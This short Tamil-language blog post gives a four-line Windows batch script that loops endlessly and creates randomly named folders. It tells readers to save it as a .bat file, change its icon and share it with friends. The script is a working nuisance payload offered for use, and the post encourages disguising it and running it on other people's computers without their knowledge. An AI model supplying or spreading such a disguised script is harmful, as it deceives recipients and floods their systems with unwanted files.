1 Click 1000+ Folders


இன்று நான் கொண்டு வந்தது ஒரு Click  மூலம் 1000 இற்கும் அதிகமான Folders  உருவாக்குவது பற்றி.
என்ன தல சுத்துதா...???
இப்ப சுத்தும் பாருங்க.

கீழே இருக்கிற Codes Copy செய்து Notepad இல் Paste செஞ்சி கொங்க.

@echo off
:top
md %random%
goto top




மறந்திடாம அந்த Codes Save  பண்ணும் பொது Anyname.bat  என்று Save செஞ்சி கொங்க.
Ok 
அவவளவு தான்.

இனி அந்த File Icon மாற்றி நண்பர்களுக்கு பகிருங்க. வேண்டுமென்றால் ட்ரை பண்ணி பார்க்கலாம்.

சின்ன குறிப்பு:
நீங்க எங்க Click பண்ணினாலும் புதுசா Create ஆவுற எல்லா Folders உம் Desktop லதான் Create ஆவும்.